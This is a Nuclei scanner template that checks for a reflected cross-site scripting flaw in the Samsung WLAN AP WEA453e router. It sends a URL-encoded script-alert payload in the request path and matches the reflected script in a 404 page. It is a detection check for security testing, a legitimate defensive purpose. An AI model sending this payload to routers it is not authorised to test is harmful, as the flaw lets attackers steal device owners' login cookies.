2021-02-15 05:53:18 +00:00
id: samsung-wlan-ap-xss

info:
  name: Samsung WLAN AP WEA453e - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,samsung
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/tmp/www/<script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 404

      - type: word
        words:
          - "text/html"
        part: header